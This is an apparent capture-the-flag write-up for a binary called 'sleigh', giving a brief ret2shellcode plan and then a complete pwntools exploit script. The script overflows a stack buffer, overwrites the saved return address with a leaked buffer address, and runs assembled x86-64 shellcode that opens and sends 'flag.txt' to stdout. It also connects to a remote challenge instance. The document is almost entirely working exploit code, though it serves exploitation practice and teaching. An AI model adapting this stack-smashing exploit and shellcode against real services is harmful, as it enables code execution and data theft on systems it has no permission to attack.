Tags: shellcode bof pwn stack-smash
Rating:
NX is disabled, so the stack is executable: anything we write into the input buffer can be run as code. The program also hands us a stack leak pointing to the start of that buffer, so we know exactly where our shellcode will live without guessing or spraying NOPs. Plan: write the shellcode into the buffer, overflow past it to overwrite the saved return address with the leaked buffer address, and let the function's `ret` land in our shellcode (classic ret2shellcode).
```python
#!/usr/bin/env python3
from pwn import *
# Target binary; checksec output is suppressed to keep the log quiet.
# Assigning it to context.binary also sets arch/bits/endianness for asm()
# and pack() from the ELF header.
context.binary = elf = ELF("./sleigh", checksec=False)

# Gadget table for the binary. Not used by the final payload, but kept so
# the script behaves the same (ROP() scans the binary when constructed).
rop = ROP(elf)

# Uncomment to dump every byte sent over / received from the tube.
# context.log_level = "debug"

# gdb commands executed when the target is started with GDB=1.
gs = '''
continue
'''
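def conn():
    """Return a pwntools tube to the target.

    REMOTE=1 connects to the CTF instance, GDB=1 runs the local binary
    under gdb with the ``gs`` script, otherwise a plain local process is
    spawned.  Exactly one tube is created: the original spawned a local
    process *and then* a second copy under gdb when GDB was set, leaking
    the first one.

    NOTE(review): the original's indentation was lost, so it is unclear
    whether REMOTE or GDB won when both were set; here REMOTE takes
    precedence (debugging a remote process is not possible anyway).
    """
    if args.REMOTE:
        return remote("178.62.75.187", 31878)
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    return process([elf.path])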
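p = conn()

# Distance from the first byte of the input buffer to the saved return
# address (taken from the original payload layout; re-measure if the binary
# changes).  The shellcode has to fit below this slot.
RET_OFFSET = 72

# Shellcode: open("flag.txt", O_RDONLY) and sendfile() its contents to
# stdout.  The "flag" string is addressed RIP-relative, so the code runs
# correctly wherever the leaked buffer address happens to be.
shellcode = asm("""
    /* rax = open("flag.txt", O_RDONLY = 0, 0) */
    lea rdi, [rip+flag]
    xor rsi, rsi
    xor rdx, rdx
    push 2
    pop rax
    syscall
    /* sendfile(out_fd = 1, in_fd = rax, offset = NULL, count = 60)
       The x86-64 syscall ABI passes arguments in rdi, rsi, rdx, r10, r8, r9,
       so the 4th argument (count) must go in r10 -- the original loaded r8,
       leaving count as whatever r10 held.  If open() failed, rax holds a
       negative errno and sendfile() simply fails as well. */
    mov rdi, 1
    mov rsi, rax
    xor rdx, rdx
    mov r10, 60
    mov rax, 40
    syscall
flag:
    .string "flag.txt"
""")
# The return-address slot must not be clobbered by the shellcode itself.
if len(shellcode) > RET_OFFSET:
    raise ValueError(f"shellcode is {len(shellcode)} bytes, must fit in {RET_OFFSET}")

p.sendlineafter(b">", b"1")
# The binary prints the buffer address after "sleigh: [" -- presumably closed
# by "]" (confirm against the binary's output).  Reading up to the bracket
# instead of a fixed 14 bytes copes with addresses of any width; the timeout
# turns a missing "]" into a parse error instead of a hang.  int(..., 16)
# accepts the 0x prefix.
p.recvuntil(b"sleigh: [")
stackleak = int(p.recvuntil(b"]", drop=True, timeout=5).strip(), 16)
info(f"Stack leak @ {stackleak}")
# Shellcode at the start of the buffer, filler up to the saved return
# address, which is overwritten with the leaked buffer address so the
# function's ret lands on the shellcode.
payload = flat({0: shellcode, RET_OFFSET: pack(stackleak)})
p.sendlineafter(b">", payload)
p.interactive()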
```